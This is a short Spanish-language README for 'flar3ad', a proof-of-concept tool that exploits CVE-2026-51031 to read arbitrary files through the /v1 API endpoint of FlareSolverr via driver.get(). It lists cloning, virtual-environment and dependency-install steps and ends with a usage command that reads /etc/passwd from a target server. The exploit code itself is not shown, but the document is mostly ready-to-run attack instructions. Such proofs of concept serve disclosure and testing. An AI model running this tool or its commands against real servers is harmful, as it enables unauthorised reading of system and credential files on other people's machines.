
POC de CVE-2026-51031 para lectura arbitraria de archivos locales
flar3ad es una herramienta que aprovecha el CVE-2026-51031 para leer archivos de un servidor objetivo utilizando el endpoint /v1 de la API de FlareSolverr y usando la función driver.get() para explotar la vulnerabilidad. Explicado con más detalle en el blog de xinyi.
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
Para salir del venv:
deactivate
Lee el archivo del servidor objetivo.
/etc/passwd./flar3ad http://localhost:8191/ /etc/passwd